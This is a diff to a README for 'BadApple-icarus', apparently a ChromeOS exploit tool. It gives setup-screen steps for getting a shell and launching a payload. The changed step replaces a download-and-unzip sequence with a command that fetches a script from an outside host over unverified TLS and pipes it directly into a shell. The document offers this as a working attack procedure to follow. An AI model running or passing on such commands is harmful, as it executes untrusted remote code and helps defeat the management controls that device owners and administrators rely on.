applefritter-inc/BadApple-icarus/README.md

 2. when the frecon screen loads, click Next
 3. next, connect to an available wifi network
 4. when the wifi has connected, DO NOT PROCEED. we now use BadApple to obtain a shell
-5. run these commands to start the icarus payload: `cd / && curl -O cdn.fanqyxl.net/icarus_ba.zip && unzip icarus_ba.zip && cd /icarus && ./icarus_ba.sh`
+5. run these commands to start the icarus payload: `curl -SLk cdn.fanqyxl.net/icarus_ota.sh | sh`

 ## build a badapple icarus image
 this is useless for the average user, only use this if you want to customize PKIMetadata or icarus_ba.sh